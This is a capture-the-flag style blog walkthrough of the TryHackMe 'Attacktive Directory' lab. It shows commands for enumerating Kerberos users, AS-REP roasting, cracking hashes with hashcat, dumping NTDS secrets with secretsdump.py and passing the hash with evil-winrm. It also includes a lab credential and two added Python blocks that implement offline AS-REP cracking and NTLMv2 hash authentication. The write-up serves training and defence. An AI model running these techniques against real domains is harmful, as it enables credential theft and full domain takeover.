Attacking Active Directory: TryHackMe

Siddhesh Parab
6 min read · Jul 12, 2022

Today we are up with yet another walkthrough, and this time the domain is an interesting one. We will be looking at a TryHackMe room called “Attacktive Directory”, which focuses on Active Directory pentesting: enumerating the domain controller, enumerating users, abusing Kerberos, and finally privilege escalation within the domain. So, without wasting any time, let's start with the fun.

[Task2]: Setting up the environment

To start with, we need to set up the environment properly, which means installing a few tools. First we install Impacket, a collection of Python classes and example scripts for working with Windows network protocols (SMB, MSRPC, Kerberos, LDAP and so on) that we will lean on throughout the room.

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

Next we install BloodHound and its dependency, the neo4j graph database, which comes in handy later in an AD engagement, using the APT package manager.

apt install bloodhound neo4j

[Task3]: Network Enumeration

We have been given the IP address of a machine, which we need to scan to find the open ports and the services running on them. Using Nmap with service detection and the default scripts (nmap -sC -sV) we scan for open ports.

The open services are the classic domain-controller set: Kerberos (88), LDAP (389/636), SMB (139/445), the global catalog (3268/3269) and RPC, which is a clear indication that the machine is a Windows domain controller running Active Directory.

(#1) What tool will allow us to enumerate port 139/445?

We will be using enum4linux to enumerate the SMB ports (139/445); it wraps the Samba client tools to pull users, groups, shares and OS information, often over a null session.

(#2) What is the NetBIOS-Domain Name of the machine?

Even Nmap's default scripts (smb-os-discovery in particular) report the NetBIOS domain name of the machine. The NetBIOS domain name is the short, pre-Windows 2000 form of the domain name, as opposed to the DNS name spookysec.local, and several tools expect the domain in that form.

(#3) What invalid TLD do people commonly use for their Active Directory Domain?

People commonly use .local, which is not a valid public TLD: it is reserved for multicast DNS (RFC 6762), which is exactly why Microsoft now advises against it for AD domains.

[Task4]: Enumerating Users via Kerbrute

The first thing to establish is which user accounts exist in the domain. For this we use a tool called Kerbrute together with a username wordlist.

(#1)What command within Kerbrute will allow us to enumerate valid usernames?

We use Kerbrute's userenum command, pointing it at the domain controller with the domain name and the wordlist (kerbrute userenum --dc <DC-IP> -d spookysec.local userlist.txt). It works by sending an AS-REQ for each candidate name without pre-authentication and reading the KDC's answer: KDC_ERR_C_PRINCIPAL_UNKNOWN means the user does not exist, while KDC_ERR_PREAUTH_REQUIRED (or an outright AS-REP) means it does. No password is ever tried, so this does not count against the lockout threshold, although Kerberos auditing on the DC (event ID 4768) can still record the requests.

(#2)What notable account is discovered?

The username that stands out is svc-admin, a service account judging by its naming convention.

(#3)What is the other notable account is discovered? (These should jump out at you)

The other notable username is backup.

[Task5]: Abusing Kerberos(AS-REP Roasting)

AS-REP roasting targets user accounts that do not require Kerberos pre-authentication. With pre-authentication, the client must first send the domain controller the current timestamp encrypted with a key derived from the user's password; the KDC only issues the AS-REP (containing the TGT) once that decrypts correctly, which prevents replay and stops an unauthenticated party from collecting ticket material to brute-force offline.

Pre-authentication is enabled by default for all user accounts, but it can be found disabled on some, typically for compatibility with legacy clients. In that case an attacker with no special privileges, not even domain credentials, can ask the KDC for an AS-REP for that known username, receive a reply whose encrypted part is keyed with the user's password-derived key, and brute-force that encrypted part offline.

To retrieve the tickets we use the GetNPUsers.py script from the Impacket collection.

(#1)We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

GetNPUsers.py spookysec.local/svc-admin -no-pass

The KDC returns an AS-REP for svc-admin with no password supplied, which means that account has “Do not require Kerberos preauthentication” set (GetNPUsers.py reports that backup, by contrast, does not have UF_DONT_REQUIRE_PREAUTH set). With a list of usernames you can test them all at once using -usersfile, and -format hashcat writes the hash in the form hashcat expects.

(#2)Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

The hashcat example hashes page lists every hash type hashcat can crack, each with its mode number and a sample of the hash's syntax, which makes identifying the exact format easy.

Kerberos 5 AS-REP etype 23

(#3)What mode is the hash?

hashcat's help section (hashcat --help) lists the mode number for each hash type; it shows that mode 18200 is the one for our Kerberos 5 AS-REP etype 23 hash.

hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

Here -a 0 is a straight dictionary attack. The --force flag only overrides hashcat's driver and self-test warnings; it is not needed on a healthy install and is better left off so those warnings are not hidden.
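The whole attack hinges on the fact that the AS-REP's encrypted part is keyed with the user's own password-derived key (for etype 23, RC4-HMAC, that key is simply the NT hash), so cracking is a pure offline loop. The following Python is an added example, not code from the article or the TryHackMe room: it plays the KDC with a constructed password to produce a $krb5asrep$23$ line in the same format GetNPUsers.py emits, then recovers the password from a small wordlist the way hashcat mode 18200 does. The password, realm string and enc-part bytes are made up for the demo; MD4 is implemented inline because hashlib's md4 is often unavailable on OpenSSL 3 builds; key usage 8 is the RC4-HMAC mapping of the AS-REP enc-part's Kerberos key usage 3 per RFC 4757, which is also what hashcat uses.

```python
import hashlib, hmac, os, struct

M32 = 0xFFFFFFFF
ETYPE_RC4_HMAC = 23    # "etype 23" in the hash line = RC4-HMAC, keyed with the NT hash
AS_REP_KEY_USAGE = 8   # RFC 4757 maps Kerberos key usage 3 (AS-REP enc-part) to T=8 for RC4-HMAC

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & M32

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib frequently lacks md4 on OpenSSL 3)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, round constant, word order, shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for f, k, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4  # register updated this step cycles a, d, c, b
                a, b, c, d = (r[(t + j) % 4] for j in range(4))
                r[t] = _rotl((a + f(b, c, d) + X[order[i]] + k) & M32, shifts[i % 4])
        state = [(s + v) & M32 for s, v in zip(state, r)]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes):
    """RFC 4757 encryption: returns (checksum, edata), the two parts that end up in the hash line."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = os.urandom(8) + plaintext            # 8-byte confounder, then the ASN.1 EncASRepPart
    checksum = _hmac_md5(k1, data)
    return checksum, rc4(_hmac_md5(k1, checksum), data)

def rc4_hmac_decrypt(key: bytes, usage: int, checksum: bytes, edata: bytes):
    """Plaintext on success, None when the checksum fails (wrong key, i.e. wrong password guess)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), edata)
    return data[8:] if hmac.compare_digest(_hmac_md5(k1, data), checksum) else None

def build_asrep_hash(user: str, realm: str, password: str, enc_part: bytes) -> str:
    """Stand-in for the KDC. With pre-auth disabled it returns this blob, encrypted under the
    user's own long-term key, to anyone who merely names the user in an AS-REQ."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), AS_REP_KEY_USAGE, enc_part)
    return f"$krb5asrep${ETYPE_RC4_HMAC}${user}@{realm}:{checksum.hex()}${edata.hex()}"

def crack_asrep_hash(line: str, wordlist) -> "str | None":
    """What hashcat -m 18200 -a 0 does: per candidate one MD4, three HMAC-MD5s and an RC4,
    entirely offline, so the domain's lockout policy never comes into play."""
    fields = line.split("$")
    if fields[1:3] != ["krb5asrep", str(ETYPE_RC4_HMAC)]:
        raise ValueError("not an etype 23 AS-REP hash line")
    checksum = bytes.fromhex(fields[3].rsplit(":", 1)[1])
    edata = bytes.fromhex(fields[4])
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_KEY_USAGE, checksum, edata) is not None:
            return candidate
    return None

if __name__ == "__main__":
    # Constructed demo values: the password and enc-part bytes are made up for this example,
    # not the room's real svc-admin credentials.
    line = build_asrep_hash("svc-admin", "SPOOKYSEC.LOCAL", "Summer2022!", b"constructed EncASRepPart")
    print(line)
    print("cracked:", crack_asrep_hash(line, ["password", "Winter2021", "Summer2022!"]))
```

The cost per guess is a handful of MD5 operations and one MD4, which is why rockyou.txt goes through in seconds on a GPU; the only defence that matters is either re-enabling pre-authentication on the account or giving it a password that no wordlist will reach.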

Now that we have the password of svc-admin, we need to see where we can use it to pivot further. Recall that SMB on port 445 was open, so let's try these credentials there.

[Task6]: Enumerating SMB

(#1)What utility can we use to map remote SMB shares?

We can use the smbclient tool to map and browse the SMB shares.

(#2)Which option will list shares?

Using smbclient's help we see that the -L flag lists the shares a host offers (smbclient -L //<DC-IP> -U svc-admin).

(#3)How many remote shares is the server listing?

The server lists a total of 6 shares.

(#4)There is one particular share that we have access to that contains a text file. Which share is it?

Enumerating the shares with the svc-admin credentials, I found that the backup share contains a text file with an interesting name.

(#5)What is the content of the file?

Using the mget command inside smbclient I downloaded the text file to my local machine.

(#6)Decoding the contents of the file, what is the full contents?

Just by looking at the file contents (the character set and the = padding) I could tell this was a Base64-encoded string, so I went ahead and decoded it with base64 -d.

backup@spookysec.local:backup2517860

[Task7]: Elevating Privileges within the Domain

(#1)What method allowed us to dump NTDS.DIT?

Now we hold credentials for backup, a domain account whose name suggests it is used to back up the domain controller. Dumping NTDS.dit remotely with a plain domain account only works if that account has the directory replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which is what makes this account interesting. Impacket's secretsdump.py exploits exactly that: pointed at the DC with the backup credentials, it uses the DRSUAPI (MS-DRSR) replication interface, the same mechanism as a DCSync attack, to ask the DC to replicate every account's secrets out of NTDS.dit without ever touching the file on disk. Run against an ordinary host the same script can also dump the SAM, LSA secrets and cached credentials from the registry hives. So let's run it against the domain controller and see what it gives us.

(#2)What is the Administrators NTLM hash?

secretsdump.py prints the “Administrator” entry from NTDS.dit in the form Administrator:500:<LM hash>:<NT hash>:::; the LM part is the well-known empty-LM placeholder, and the NT part is the NTLM hash we want.

(#3)What method of attack could allow us to authenticate as the user without the password?

Now that we have the NTLM hash of the Administrator account, we can use a well-known technique called pass-the-hash: NTLM authentication proves possession of the NT hash rather than the password, so the hash alone is enough to log in. I will be using another popular tool, evil-winrm, which talks to the Windows Remote Management (WinRM, ports 5985/5986) service. Had the question not called for a specific tool, psexec.py from Impacket with its -hashes option would do the job just as well.

(#4)Using a tool called Evil-WinRM what option will allow us to use a hash?

The help section shows that the -H flag takes the NT hash (evil-winrm -i <DC-IP> -u Administrator -H <NT hash>). With those flags set we are granted a shell on the domain controller as Administrator.
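To see why a hash, with no password, is enough for evil-winrm, it helps to walk through the NTLMv2 computation that both sides actually perform. The following Python is an added example, not code from the article, the room or evil-winrm: it parses a secretsdump-style line (the hash value in it is constructed, not the room's real Administrator hash), computes the NTLMv2 challenge response per MS-NLMP the way an NTLM client does, and then plays the domain controller, which verifies it using the very same NT hash it keeps in NTDS.dit. The server challenge, domain string and AV_PAIRS target info are constructed stand-ins for what a real NTLM CHALLENGE_MESSAGE carries.

```python
import hashlib, hmac, os, struct, time

def nt_hash_from_secretsdump_line(line: str) -> bytes:
    """Parse secretsdump.py's user:rid:lmhash:nthash::: format and return the NT hash bytes."""
    user, rid, lm, nt, *_ = line.strip().split(":")
    return bytes.fromhex(nt)

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UTF-16LE(upper(user) + domain).
    The password never appears here; the NT hash *is* the long-term secret."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()

def _filetime_now() -> int:
    """Windows FILETIME: 100 ns ticks since 1601-01-01."""
    return int((time.time() + 11644473600) * 10_000_000)

def ntlmv2_response(nt_hash, user, domain, server_challenge, target_info,
                    client_challenge=None, timestamp=None) -> bytes:
    """Client side (MS-NLMP 3.3.2): NtChallengeResponse = NTProofStr || temp."""
    temp = (b"\x01\x01" + bytes(6)                                   # Responserversion, HiResponserversion, reserved
            + struct.pack("<Q", _filetime_now() if timestamp is None else timestamp)
            + (client_challenge or os.urandom(8))
            + bytes(4) + target_info + bytes(4))                     # reserved, AV_PAIRS echoed from server, reserved
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp

def server_verify(stored_nt_hash, user, domain, server_challenge, response) -> bool:
    """Server side: recompute NTProofStr from the NT hash stored in NTDS.dit and compare.
    Same hash in, same proof out, so whoever holds the hash authenticates without the password."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)

def demo() -> bool:
    # Constructed values: this NT hash, challenge and target info are made up for the example;
    # the hash is not the room's Administrator hash.
    dumped = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:9d2f6c1a8e4b7d3c5a1f0e6b2c8d4e7f:::"
    nt = nt_hash_from_secretsdump_line(dumped)
    server_challenge = os.urandom(8)              # from the server's CHALLENGE_MESSAGE
    target_info = b"constructed AV_PAIRS"          # normally NbDomainName/NbComputerName/... pairs
    response = ntlmv2_response(nt, "Administrator", "SPOOKYSEC.LOCAL", server_challenge, target_info)
    return server_verify(nt, "Administrator", "SPOOKYSEC.LOCAL", server_challenge, response)

if __name__ == "__main__":
    print("authenticated with the hash alone:", demo())
```

The domain controller never sees a password in this exchange, only a proof computed from the NT hash, so it cannot tell a legitimate client from one that merely holds the dump; evil-winrm -H feeds the hash into exactly this computation over HTTP. That is also why rotating the Administrator password (and the krbtgt password, twice) after a dump like this is the minimum cleanup.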

With this we complete another great room from TryHackMe. That's it for today; I will be back with another article soon. Till then, keep grinding and keep learning new stuff!
